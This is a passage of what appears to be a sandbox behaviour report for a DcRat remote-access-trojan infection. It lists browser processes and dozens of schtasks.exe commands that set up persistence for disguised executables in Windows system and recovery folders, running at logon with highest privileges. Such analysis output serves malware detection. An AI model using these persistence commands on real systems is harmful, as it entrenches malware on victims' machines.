    PID:7412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
    3⤵
    PID:7424
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
    3⤵
    PID:7896
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6848 /prefetch:8
    3⤵
    PID:7856
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
    3⤵
    PID:7380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
    3⤵
    PID:400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:1
    3⤵
    PID:7248
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13409087225879190342,14677636902493083763,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
    3⤵
    PID:7384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:1036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff834413cb8,0x7ff834413cc8,0x7ff834413cd8
    3⤵
    PID:2436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,9504204944884760657,8541377084205802183,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1812 /prefetch:3
    3⤵
    PID:6484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "938b92958ded4d50a357d22eddf141ad9" /sc MINUTE /mo 14 /tr "'C:\Windows\Registration\CRMLog\938b92958ded4d50a357d22eddf141ad.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "938b92958ded4d50a357d22eddf141ad" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\938b92958ded4d50a357d22eddf141ad.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "938b92958ded4d50a357d22eddf141ad9" /sc MINUTE /mo 9 /tr "'C:\Windows\Registration\CRMLog\938b92958ded4d50a357d22eddf141ad.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4048 -ip 4048
1⤵
PID:1776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Users\Public\sysmon.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Public\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:4364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Public\AccountPictures\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:4940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\Users\Public\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b653" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa7" /sc MINUTE /mo 10 /tr "'C:\Windows\BrowserCore\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de519071" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b653" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:5660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラックク" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\クラック.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de519071" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラック" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\クラック.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa" /sc ONLOGON /tr "'C:\Windows\BrowserCore\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラックク" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\クラック.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\Registry.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3696

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004D0
1⤵
PID:1184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa7" /sc MINUTE /mo 13 /tr "'C:\Windows\BrowserCore\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows NT\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cbgsujmwwsc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\cbgsujmwws.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:4948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cbgsujmwws" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cbgsujmwws.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad472193" /sc MINUTE /mo 5 /tr "'C:\Windows\Fonts\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219" /sc ONLOGON /tr "'C:\Windows\Fonts\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cbgsujmwwsc" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\cbgsujmwws.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:5132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad472193" /sc MINUTE /mo 11 /tr "'C:\Windows\Fonts\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jkv" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\virus.jk.jk.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6564

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jk" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\virus.jk.jk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Happy18H" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\Happy18.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jkv" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\virus.jk.jk.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:6872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\57ccb6f0bd910fed428761828ae93553.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:4064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "malecusm" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\malecus.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Happy18" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\Happy18.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Windows\Tasks\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\Tasks\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Windows\Tasks\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:5720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "malecus" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\malecus.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:6716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BTZB" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\images\BTZ.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Happy18H" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\Happy18.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:6604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BTZ" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\images\BTZ.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5936 -ip 5936
1⤵
PID:352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "malecusm" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\malecus.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:5176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\57ccb6f0bd910fed428761828ae93553.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BTZB" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\images\BTZ.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Mail\conhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\Accessories\en-US\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:7048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-US\schtasks.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:5160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jkv" /sc MINUTE /mo 7 /tr "'C:\Program Files\Common Files\DESIGNER\virus.jk.jk.exe'" /f
1⤵
- DcRat
PID:5896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jk" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\virus.jk.jk.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\Accessories\en-US\schtasks.exe'" /rl HIGHEST /f
1⤵
PID:7140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "virus.jk.jkv" /sc MINUTE /mo 7 /tr "'C:\Program Files\Common Files\DESIGNER\virus.jk.jk.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
1⤵
PID:6792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPaneH" /sc MINUTE /mo 12 /tr "'C:\Windows\IME\IMEKR\HelpPane.exe'" /f
1⤵
- DcRat
PID:3440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPane" /sc ONLOGON /tr "'C:\Windows\IME\IMEKR\HelpPane.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPaneH" /sc MINUTE /mo 8 /tr "'C:\Windows\IME\IMEKR\HelpPane.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPaneH" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\HelpPane.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\assembly\WmiPrvSE.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\assembly\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPane" /sc ONLOGON /tr "'C:\Users\Default User\HelpPane.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Windows\assembly\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HelpPaneH" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\HelpPane.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:4788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6548

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:6204

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:8000

C:\Windows\SysWOW64\colorcpl.exe
"C:\Windows\SysWOW64\colorcpl.exe"
1⤵
PID:2252

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3360

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Fonts\RuntimeBroker.exe'" /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:720

C:\Windows\SysWOW64\wowmgr.exe
C:\Windows\SysWOW64\wowmgr.exe
1⤵
PID:5856

C:\Windows\system32\schtasks.exe
